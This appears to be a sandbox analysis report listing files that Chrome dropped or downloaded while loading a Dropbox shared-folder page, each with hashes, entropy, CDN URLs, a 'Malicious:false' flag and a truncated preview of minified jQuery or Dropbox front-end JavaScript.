                                                    SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4753)
                                                    Category:dropped
                                                    Size (bytes):4818
                                                    Entropy (8bit):5.255646387709363
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5471D1B479257600F6C61B2E7944FA6B
                                                    SHA1:B4019E8EA0BC0A037CE75EAF8F7F7DDF9C9EB281
                                                    SHA-256:7027305B63640DA5846C6316D29D6004ECFB3E553D68C637AEEEB64A6A18C49A
                                                    SHA-512:F1EF8518D041C143F7546843A704EA2CDE694CA1F27177BF4CB36F543459A31AB53E0731BEB5A4DFC6574C09629AB6CD5C6D4C46B41364B81AE122DCA1D6815C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_reduxjs_toolkit_redux-toolkit","./c_browse_data_selectors","./c_sharing_avatar_info","./e_data_modules_stormcrow","./c_tagging_data_store"],(function(e,a,t,r,s,i,n){"use strict";const d={sharedFolderDataByTargetNamespaceId:{},hasSharedDataLoadedByParentPath:{},sharedLinkExistsByFileIdOrPath:{},sharedFileDataByFileId:{},integrationData:void 0},o=(e,t,r)=>{return s="/share_ajax/shared_with",i={max_results:r,fq_path_prefix:t,include_inherited:!0,sort_by_name:!0},n=!1,d=e,o=!0,new Promise(((e,t)=>{(n?a.SilentBackgroundRequest$2:a.WebRequest)({url:s,type:"POST",dataType:"json",data:i,subject_user:d,skipNotifyError:o,success:e,error:(e,a,r)=>t(Error(`error: ${r}, status: ${a}`))})}));var s,i,n,d,o};function l(e,a){return["share_ajax:shared_with",e,a.toString()]}const h=e=>r.user(e);let _=null;const u=({parentPath:e})=>(t,s)=>{const i=s(),n=h(i),d=r.mountPoints(i),o={};d&&d.forEach(((e,t)=>o[t]={memberCount:1,joinedMembers:[{...n
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (65529), with no line terminators
                                                    Category:dropped
                                                    Size (bytes):194821
                                                    Entropy (8bit):5.510690766344694
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:04295DBA9EEE14A84F7C33B3B2BF6FC8
                                                    SHA1:904F64A3C816253671DB6FE2FBE4CDD2C00BEDE6
                                                    SHA-256:A6AEC8D150760059AC8930F0E83276995556F42E7621D9379CC4A3A8ECC99C5C
                                                    SHA-512:357C1CE85FFEA65EA9797E7A1B18D87832CFD2055E41CF455C5C64969BD7EB0E9AAC7671A5E49A0B719F45F77730CB8D79108A9B2B80EA6CC254237D7E4D6C1F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports"],(function(n){"use strict";var t=function(){return t=Object.assign||function(n){for(var t,r=1,e=arguments.length;r<e;r++)for(var i in t=arguments[r])Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i]);return n},t.apply(this,arguments)};function r(n,t){var r={};for(var e in n)Object.prototype.hasOwnProperty.call(n,e)&&t.indexOf(e)<0&&(r[e]=n[e]);if(null!=n&&"function"==typeof Object.getOwnPropertySymbols){var i=0;for(e=Object.getOwnPropertySymbols(n);i<e.length;i++)t.indexOf(e[i])<0&&Object.prototype.propertyIsEnumerable.call(n,e[i])&&(r[e[i]]=n[e[i]])}return r}function e(n,t,r,e){return new(r||(r=Promise))((function(i,o){function u(n){try{a(e.next(n))}catch(n){o(n)}}function c(n){try{a(e.throw(n))}catch(n){o(n)}}function a(n){var t;n.done?i(n.value):(t=n.value,t instanceof r?t:new r((function(n){n(t)}))).then(u,c)}a((e=e.apply(n,t||[])).next())}))}function i(n,t){var r,e,i,o,u={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return o={next
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (3602)
                                                    Category:downloaded
                                                    Size (bytes):3655
                                                    Entropy (8bit):5.175697683719268
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:B4A41242F9B6259534D96C76406A66C9
                                                    SHA1:6D05A06A22EF5D41F9A954157E715C443F1A781A
                                                    SHA-256:5A8B389D1A6BF090531A2F16E4985A8DB31A0C833FD156871CC098BC0CA92BDE
                                                    SHA-512:8B0E7281F30C95016EAC55D3E00135E8C4E890515E328314006ACC20C030755B564CE1B96C5A5BFD217D50C026E3192EA14FA00C817114AE1F30C0A993C85F16
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_src_sidebar-vfltKQSQv.js
                                                    Preview:define(["exports","react","./c_core_i18n","./e_file_viewer_static_scl_page_folder","./c_pap-events_sign_save_signature_doc","./c_dig-components_drawer_index","./c_file_viewer_api_navigation","./e_core_exception","./c_lodash","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_ts_utils","metaserver/static/js/langpack","./e_edison","./c_api_v2_routes_folders_info_provider","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer","./c_core_data_ui","./c_react-redux_hooks_useDispatch","./c_file_viewer_hooks_usePrevious","./c_core_utils_is_text_preview_on"],(function(e,t,n,r,a,c,s,i,o,_,l,d,u,g,m,b,p,f,v,y,E,w,I,j,C){"use strict";function x(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(n){if("default"!==n){var r=Object.getOwnPropertyDescriptor(e,n);Object.defi
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (818)
                                                    Category:downloaded
                                                    Size (bytes):869
                                                    Entropy (8bit):5.376521243696234
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:C8D4729F07D89464B33D128F1C17ADD4
                                                    SHA1:B8DE10224A7FC4593F3AF18E7AD40255E254EC5D
                                                    SHA-256:DD0FC35073D5810ED2078F781B9D5034CAF912EF227C0D5718A36F24C2C79523
                                                    SHA-512:FE134B98D78A38924ABBB8D9227DAAF0CCC76F214DC85A65CE443527024235DFCFCF9E66755B5B4159B7B5EFE174DD60904EE8597E57F61311FAFB26A7DD269C
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_pnm_utils-vflyNRynw.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder"],(function(e,n){"use strict";const i=["dbx-backup","dbx-external-drive","dbx-computer-backup"];function t(e){var n,i,t;const o=null===(n=null==e?void 0:e.link_node)||void 0===n?void 0:n.action;return null!==(t=null!==(i=null==o?void 0:o[".tag"])&&void 0!==i?i:o)&&void 0!==t?t:null}e.BACKUP_PRE_SETUP_ACTION="device_folder_pre_setup",e.PASSWORDS_POST_SETUP_ACTION="passwords_post_setup",e.PASSWORDS_PRE_SETUP_ACTION="passwords_pre_setup",e.VAULT_PRE_SETUP_ACTION="life_vault_pre_setup",e.getDisplayedFilename=e=>i.includes(n.file_extension(e))?n.filename_without_extension(e):e,e.getLinkNodeAction=t,e.hasValidLinkNode=function(e){const n=t(e);return!(!n||"unknown_action"===n)},e.shouldHideExtension=function(e){return!!(null==e?void 0:e.hide_extension)}}));.//# sourceMappingURL=c_pnm_utils.js-vfl0Exj0q.map.
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1908)
                                                    Category:downloaded
                                                    Size (bytes):1981
                                                    Entropy (8bit):5.52251299602183
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F5A94BF326F25DB7BA4E2A922B54CEBB
                                                    SHA1:0AD0004E4E499AB82A553D89F23FD2150BEA9400
                                                    SHA-256:EBAB3E402D909955C90F170A1EBBFA390C143AF4A20D8107538790BD2192B959
                                                    SHA-512:A138F25230FAEDD1E38D2682DC7F5FE396C2A369E5FF0D5AEBE39AAA0CB4A22AC4B9451D4E9A4620B6F8DB286C3FE1455FF5C5F4CE85D9567D45FD21A95FF6AB
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_flows_utils_auto_folder_helpers-vfl9alL8y.js
                                                    Preview:define(["exports","./c_flows_constants"],(function(e,n){"use strict";function r(e){throw new Error(`Unexpected value: ${e}`)}const t=e=>{let t;switch(e.actionType){case"audio_conversion":case"video_conversion":case"image_conversion":t=e.data.format;break;case"pdf_conversion":return["pdf"];case"watermarking":return n.SUPPORTED_WATERMARKING_EXTENSIONS;case"unzip":case"tag":case"tidy_up":case"naming_conventions":case"move_file":return;default:r(e.actionType)}return t?[t]:void 0};e.getConversionFileSizeLimitMB=function(e,r){if(!e||!r)return 1/0;if([...n.SUPPORTED_AUDIO_OUTPUT_CONTAINERS,...n.SUPPORTED_VIDEO_OUTPUT_CONTAINERS].includes(r.toLowerCase()))return n.MEDIA_REMUX_FILE_SIZE_LIMIT;const t=new Set;for(let _ of e)if(_=_.toLowerCase(),"pdf"===r.toLowerCase()){if(!n.PDF_CONVERSION_FILE_SIZE_LIMIT_MAP[_])return 1/0;t.add(n.PDF_CONVERSION_FILE_SIZE_LIMIT_MAP[_])}else if(n.SUPPORTED_IMAGE_OUTPUT_EXTENSIONS.includes(r.toLowerCase())){if(!n.IMAGE_CONVERSION_FILE_SIZE_LIMIT_MAP[_])return 1/0;
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1219)
                                                    Category:downloaded
                                                    Size (bytes):1295
                                                    Entropy (8bit):5.200565839634795
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0DA2DB8C25114F26BA50960980415418
                                                    SHA1:DB9925983D0DCB31DC0FFE1D71EE2F2D2C1FEA20
                                                    SHA-256:0E4D8D5451C687F57A2E9AE45227B75187EB8E0D837B1C30DC33BCA5C0C1B130
                                                    SHA-512:7B554A6FF275175F6D9CC1CECBDE42169683B848834F177C8BB7D8E1087AD508C6034861BC553A3BCFF824106F8089565E13014E95CB8325626592087C8370D0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_file_viewer_hooks_use_mouse_active-vflDaLbjC.js
                                                    Preview:define(["exports","./c_juggle_resize-observer_ResizeObserver","react","./c_lodash"],(function(e,t,r,n){"use strict";function i(e){return e&&e.__esModule?e:{default:e}}var o=i(r);var u;e.FileViewerBreakpoint=void 0,(u=e.FileViewerBreakpoint||(e.FileViewerBreakpoint={})).SM="small",u.MD="medium",u.LG="large";e.useMouseActive=e=>{const[t,r]=o.default.useState(!0),i=o.default.useRef(void 0),u=o.default.useMemo((()=>n.lodashExports.throttle((()=>{const t=()=>{i.current&&window.clearTimeout(i.current)};return r(!0),t(),i.current=window.setTimeout((()=>{r(!1)}),e),t}))),[e]);o.default.useEffect((()=>(window.addEventListener("mousemove",u),()=>window.removeEventListener("mousemove",u))));return{isUserInteractingWithElement:t,handleFocus:o.default.useCallback((()=>{r(!0)}),[]),handleBlur:o.default.useCallback((()=>{r(!1)}),[])}},e.useResponsiveSize=()=>{const r=(()=>{const[e,r]=o.default.useState(document.body.getBoundingClientRect().width);return o.default.useEffect((()=>{const e=new t.ResizeO
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (994)
                                                    Category:dropped
                                                    Size (bytes):1052
                                                    Entropy (8bit):5.252790726986788
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A0086A8E59A93BC509926B8586FB9C10
                                                    SHA1:7720B4A248F50CC81FE687AC079B8E1E1680249A
                                                    SHA-256:27A19BCEB73CCA89166E0B3D8DB60214BEA4B5B2FAE6D4F6ED19203F837A7581
                                                    SHA-512:F4BED00F8C5F4D9FBBA7ADA1FD80C6835F86E8EE32C369CF81E2E88EE074FC4498616F66085379826F9D3D9BFB6987C73C6EA23CA68A01F0ED5B18FA314FCB3D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","react","./e_file_viewer_static_scl_page_folder","./c_react_query_api_helpers_queries_cloud_docs_team_settings","./e_data_modules_stormcrow","./e_core_exception","./c_ts_utils","./e_edison"],(function(e,t,o,r,i,a,d,n){"use strict";e.getCloudDocsInfoFromQuery=e=>{if(!e.is_team)return{openWithGddSupported:!0};const t={openWithGddSupported:!1},a=r.cloudDocsTeamSettingsRequestPackage.getQueryKey(),d=i.queryClient.getQueryData(a);return d&&d.apiData?(t.openWithGddSupported=d.apiData.settings[o.CloudDocProviderIntegration.GDD_INTEGRATION][".tag"]===o.IntegrationCreateAndEdit[".tag"],t):t},e.useCloudDocsInfo=e=>{if(!e.is_team)return{openWithGddSupported:!0};const t={openWithGddSupported:!1},{data:i,isLoading:a,isError:d}=r.cloudDocsTeamSettingsRequestPackage.useQuery({});return a||d||!(null==i?void 0:i.apiData)||(t.openWithGddSupported=(null==i?void 0:i.apiData.settings[o.CloudDocProviderIntegration.GDD_INTEGRATION][".tag"])===o.IntegrationCreateAndEdit[".tag"]),t}}));.//# s
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (11488)
                                                    Category:dropped
                                                    Size (bytes):11560
                                                    Entropy (8bit):5.362913352225265
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:054A14D742EE79E94A892D48CE447EFB
                                                    SHA1:763BEF8791193CF092D27D238D58E8CC8397CEBC
                                                    SHA-256:1563A8876698948EE55CC9CFA3E9BB557D94BBE884A769B5B8DCE87A2B7E35E1
                                                    SHA-512:5A784EFD8F2939BA60C8B6038B8504034848FCDAB364C78399339A3B9333E17DAFC5E014D822AA3E9A791F5E9B0145F34F76189788598FD66FF35705149B91E2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","react","./c_dig-icons_assets_ui-icon_line_upload"],(function(e,t,o,a){"use strict";function n(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(o){if("default"!==o){var a=Object.getOwnPropertyDescriptor(e,o);Object.defineProperty(t,o,a.get?a:{enumerable:!0,get:function(){return e[o]}})}})),t.default=e,Object.freeze(t)}var s=n(o),r="dig-Typeahead-row--interactive",i=[`.${r}[role="option"]`,`.${r}[role="menuitemcheckbox"]`,".dig-Typeahead-results--show-more"],l={value:void 0,setSelected:()=>!1,setFocused:()=>!1,setSyntheticFocus:()=>!1,closeMenu:()=>!1,isPortaled:!0,menuRows:t.createMenuRows(),containerId:"",setIsTypeaheadDropdownVisible:()=>{},shouldOmitWrapperOverlay:!1,setShouldOmitWrapperOverlay:()=>{}},c=s.createContext(l),u=s.createContext({}),d=s.createContext({}),m=({children:e,isPortaled:o,closeOnSelection:a=!0,inlineProps:n,openMenuOnFocus:r=!0,containerId:l,hasMaxHeigh
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1512)
                                                    Category:downloaded
                                                    Size (bytes):1615
                                                    Entropy (8bit):5.154278175934665
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:5F35FE100494B6257CE2BBB17082C64E
                                                    SHA1:AD521E9A080FA5FE46CC3B4ACF1354D25067EE79
                                                    SHA-256:CDFFEF3AFA64D1B643B9E5DBFA1E90203EE034D5DA74B67710553C0008B0D6A4
                                                    SHA-512:AB39A41DF2FD9D64A160213E257A11FB3D3AE0A22A3933F5B8A5015227FBD7AE060964BDC8C81FFDC82A563C7916AD261E601FB0AAAAF97AF95634A095523D19
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_shared-folder-preview-page_actions_on-copy-link.after-display-vflXzX-EA.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_api_v2_routes_folders_info_provider","./e_core_exception","./c_ts_utils","react","./c_core_i18n","./c_src_sink_index","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_lodash","metaserver/static/js/langpack","./e_edison","./e_data_modules_stormcrow","./c_core_notify","react-dom","./c_performance_metrics_route_name_resolver","./c_integrations_hellosign_deep_integration_constants","metaserver/static/js/modules/constants/viewer"],(function(e,r,o,t,i,n,_,a,s,c,d,l,f,u,v,p,h,S){"use strict";e.onCopyLink=({user:e,folder:o,folderShareToken:t,folderSharedLinkInfo:i})=>{const n=r.vendSenderTrackey(),_=r.appendTrackeyToSharedLinkAndSortParams(window.location.href,n);r.logPAPCopySharedLinkEvent({eventState:"start",actionElement:r.ActionSurfaceLogValue.ACTION_BAR,actionSurface:"shared_folder_previews",requestedAccessLevel:"viewer",fileIdOrPath:o.folder_id?o.folder_id.toString():o.filename,hasCachedLink:!0,url:_}),r.copyToCli
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (3483)
                                                    Category:dropped
                                                    Size (bytes):3542
                                                    Entropy (8bit):5.3875575488005065
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:99706A806B36B925FAEA1269EBBEAFE2
                                                    SHA1:EBBB7C71F5C6CC957D32843867646F89D348DBFA
                                                    SHA-256:203CC7BFBA66A1F5C88AE32571351501B5A2FD94BCD90CBDC5A41118BCBF88E4
                                                    SHA-512:80D93C7E721DC9CEEFFD5B923032F3DE2E2F8C454057C953BD98078F8D5742EB631A89D85C8C435ECBFE940BF351B7977F331DA27A5B9EB62B552EE92F5402C2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./c_lodash"],(function(e,t){"use strict";var n,r={exports:{}};self,n=()=>{return e={"./src/keymaster.js":e=>{var t,n={},r={16:!1,18:!1,17:!1,91:!1},o="all",i={".":16,shift:16,".":18,alt:18,option:18,".":17,ctrl:17,control:17,".":91,command:91},a={backspace:8,tab:9,clear:12,enter:13,return:13,esc:27,escape:27,space:32,left:37,up:38,right:39,down:40,del:46,delete:46,home:36,end:35,pageup:33,pagedown:34,",":188,".":190,"/":191,"`":192,"-":189,"=":187,";":186,"'":222,"[":219,"]":221,"\\":220};for(t=1;t<20;t++)a["f"+t]=111+t;function l(e,t){for(var n=e.length;n--;)if(e[n]===t)return n;return-1}function s(){for(t in r)r.hasOwnProperty(t)&&(r[t]=!1)}function c(e,t,r){var o,l,s,c;for(void 0===r&&(r=t,t="all"),""==(o=(e=e.replace(/\s/g,"")).split(","))[o.length-1]&&(o[o.length-2]+=","),s=0;s<o.length;s++){if(l=[],(e=o[s].split("+")).length>1){for(l=e.slice(0,e.length-1),c=0;c<l.length;c++)l[c]=i[l[c]];e=[e[e.length-1]]}e=e[0],(e=a[e]||e.toUpperCase().charCodeAt(0))in
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (5094)
                                                    Category:downloaded
                                                    Size (bytes):5184
                                                    Entropy (8bit):5.393179006940565
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:1C25426AC4A5DC6014026999F79F4BB3
                                                    SHA1:BDE12EE0AF3F51BA689C164C103F6170D8B7C920
                                                    SHA-256:DB11804C0D5859C96B47E4605D55CBBFD3AEE925022DB835A2643DB18F71FD20
                                                    SHA-512:FD600DDFEA8FF0FB1636CD442B01A05F47F8C5F123A95A9C50285BCABC536C7263B47005B29CDC7A1B3988F50EFEA7168E474EAF3044150F1006D55ED9C3089F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_pap-events_docsend_view_docsend_hub_entry_button-vflHCVCas.js
                                                    Preview:define(["exports","./c_ts_utils"],(function(e,n){"use strict";function o(e=navigator.userAgent){const n=function(e){const n=e.toLowerCase(),o=/(ipad)/.exec(n)||/(crios)[ \/]([\w.]+)/.exec(n)||/(fxios)[ \/]([\w.]+)/.exec(n)||/(opt|opr|opios).*[ \/]([\w.]+)/.exec(n)||/(edge)[ \/]([\w.]+)/.exec(n)||/(edg)[ \/]([\w.]+)/.exec(n)||/(chrome)[ \/]([\w.]+)/.exec(n)||/(webkit)[ \/]([\w.]+)/.exec(n)||/(opera)(?:.*version|)[ \/]([\w.]+)/.exec(n)||/(msie) ([\w.]+)/.exec(n)||/(trident).*? rv:([\w.]+)/.exec(n)||n.indexOf("compatible")<0&&/(mozilla)(?:.*? rv:([\w.]+)|)/.exec(n)||[],i=n.match(/version\/([\d.]+)/i);let t=null!=i?o[1]:null;return"webkit"===t&&(t=null!=i?i[1]:null),{browser:o[1]||"",version:t||o[2]||"0",userAgent:e}}(e);return"trident"===n.browser&&(n.browser="msie"),n}function i(e=navigator.userAgent){const n=o(e),i="ipad"===n.browser||void 0,t=!!["chrome","crios"].includes(n.browser)||void 0,s=!("webkit"!==n.browser&&!Boolean(i))||void 0,r=!!["opt","opr","opios","opera"].includes(n.brow
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (1615)
                                                    Category:downloaded
                                                    Size (bytes):1691
                                                    Entropy (8bit):5.337996201389741
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:F20C7EA4BCACD4F33F15CAB2F30B2235
                                                    SHA1:CAE5F09EC9029ED9183C71098CF7093208883616
                                                    SHA-256:AA059F38D18743F0F93393A4A00459FA97D2DE2511C02712C56FF35908D99691
                                                    SHA-512:86BAD126C439390BD9FB6BDAD4CDBC0F960ADE8631BAE3AB5F458ED815FC494C272948D25FB72416C1C6CE188E67D0CC9DAB76EA8F9F1363BABAF389EDA3AFE0
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_dig-icons_assets_ui-icon_line_file-vfl8gx-pL.js
                                                    Preview:define(["exports","react"],(function(e,t){"use strict";function r(e){if(e&&e.__esModule)return e;var t=Object.create(null);return e&&Object.keys(e).forEach((function(r){if("default"!==r){var n=Object.getOwnPropertyDescriptor(e,r);Object.defineProperty(t,r,n.get?n:{enumerable:!0,get:function(){return e[r]}})}})),t.default=e,Object.freeze(t)}var n=r(t);e.CalendarLine=e=>n.createElement("svg",{viewBox:"0 0 24 24",fill:"none",...e},n.createElement("path",{d:"M3.5 5v11.25a2.25 2.25 0 0 0 2.25 2.25h12A2.249 2.249 0 0 0 20 16.25V5H3.5ZM5 6.5h13.5V8H5V6.5Zm13.5 9.75a.75.75 0 0 1-.75.75h-12a.75.75 0 0 1-.75-.75V9.5h13.5v6.75Z",fill:"currentColor",vectorEffect:"non-scaling-stroke"}),n.createElement("path",{d:"M11.75 12.5a.75.75 0 1 0-.75-.75.697.697 0 0 0 .75.75Zm-3 0a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm0 3a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm3 0a.75.75 0 1 0-.75-.75.697.697 0 0 0 .75.75Zm3-3a.75.75 0 1 0-.75-.75.697.697 0 0 0 .75.75Zm0 3a.75.75 0 1 0-.75-.75.697.697 0 0 0 .75.75Z",fill:"cur
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (18467)
                                                    Category:dropped
                                                    Size (bytes):18528
                                                    Entropy (8bit):5.457610255331522
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:A5A718F59742F1A966780E5B82D540E3
                                                    SHA1:5692E8FA0F62D26C9325468690CEC1D93601DEC3
                                                    SHA-256:84255E7CA8294915AFA430584AA6E29A0A1ADE5E7F2736ED2C5E0E9E78CBFCA6
                                                    SHA-512:9270E9CDF69459DA9ABEE38F31D867645A654349B38E75AFC6601B3BAAF433D50583971B21FCD7CD63D1E0E2C8B2EACEC760A89DDC3EA5B2155223379854FFA2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_flows_constants","./e_edison","./c_ts_utils","./e_core_exception","./c_api_v2_routes_folders_info_provider","./c_pap-events_docsend_view_docsend_hub_entry_button","./c_src_sink_index","./c_lodash"],(function(e,t,o,r,l,i,a,n,s,u){"use strict";var d,_;function c(e,r,l){const i={update_rules_arg:{".tag":"update_folder_rules_arg",folder_fq_path:e,rule_set:r,apply_to_existing_files:l}};return o.GetFlowsRoutes(new t.DefaultUserApiV2Client(t.mustGetActiveUserApiV2Properties())).rpc("update_rules",i,{})}e.Actions=void 0,(d=e.Actions||(e.Actions={})).GetUserAutomations="AUTOMATIONS/GET_USER_AUTOMATIONS",d.SetUserAutomations="AUTOMATIONS/SET_USER_AUTOMATIONS",d.AddUserAutomation="AUTOMATIONS/ADD_USER_AUTOMATION",d.EditUserAutomation="AUTOMATIONS/EDIT_USER_AUTOMATION",d.RemoveUserAutomation="AUTOMATIONS/REMOVE_USER_AUTOMATION",d.MergeUserAutomations="AUTOMATIONS/MERGE_USER_AUTOMATIONS",d.ToggleAutomationStatus="TOGGLE_AUTOMATION_STAT
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (4261)
                                                    Category:downloaded
                                                    Size (bytes):4315
                                                    Entropy (8bit):5.121465601327223
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:0FB8380260B97192B46853A570CB6738
                                                    SHA1:09D3DF88CD56D3A826F48A9FBFDEAACF0385B897
                                                    SHA-256:0335AC2829F9EF83ACF7B3DF8D27E9186CFB7D287A028B1EBEF7361D3F2F9542
                                                    SHA-512:3095E326D1746E38614D3CDEB235E8F4682B23A9199B47D914CD0E6A029820DD1B6813C5AF82EF4B29774A3890D12D6B990F4CFCC51525201FF6346EF1BAA331
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cfl.dropboxstatic.com/static/atlas/file_viewer/scl_oboe_folder_bundle_amd/dist/c_ui_modal_dig-vflD7g4Am.js
                                                    Preview:define(["exports","./e_file_viewer_static_scl_page_folder","./c_core_notify","react","./c_core_i18n"],(function(e,t,a,l,o){"use strict";function n(e){return e&&e.__esModule?e:{default:e}}var s=n(l);t.injectInternalStyle("/static/metaserver/static/js/clean/ui/modal_dig.module.out-vflQZv0TG.css",(e=>"._modal-header_1cj7q_1{overflow-wrap:break-word}"));const d="_modal-header_1cj7q_1",{Header:i,Footer:c,Body:m}=t.Modal;class r extends s.default.Component{constructor(e){super(e),this.state={open:!0},this.modal=s.default.createRef(),this.modalBox=s.default.createRef()}invokeCBThenCloseModal(e,a,l=!1){"function"==typeof e&&e.call(this,a);let o=a.defaultPrevented;"isDefaultPrevented"in a&&(o=a.isDefaultPrevented()),o||(this.props.autoClose||l)&&t.unmountModal()}dismissModal(e){const{onDismiss:t,onDismissCompleted:a}=this.props;this.invokeCBThenCloseModal(t,e,!0),a&&a.call(this,e)}onCancelActionClicked(e){this.props.onCancel?this.invokeCBThenCloseModal(this.props.onCancel,e,!0):this.dismissModa
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (14923)
                                                    Category:dropped
                                                    Size (bytes):15002
                                                    Entropy (8bit):5.360450361011092
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:88F1D6D53A9074623256A6D63C1C31B9
                                                    SHA1:243290A59CEC8744378C6128141EC9A936CC4365
                                                    SHA-256:B964780D193AD51A6A3AD4B5481E21DCD482F27E58895B5DE5AA2CA2FA761091
                                                    SHA-512:66153B17C282022ED057A1C4A4BE505D46DF7D009131F7F0E5689FE878DD9294A60DBDEC1875F2AAA30863CC0BA40E4B8FE37890C2FB6653BE9752A5F178E94E
                                                    Malicious:false
                                                    Reputation:unknown
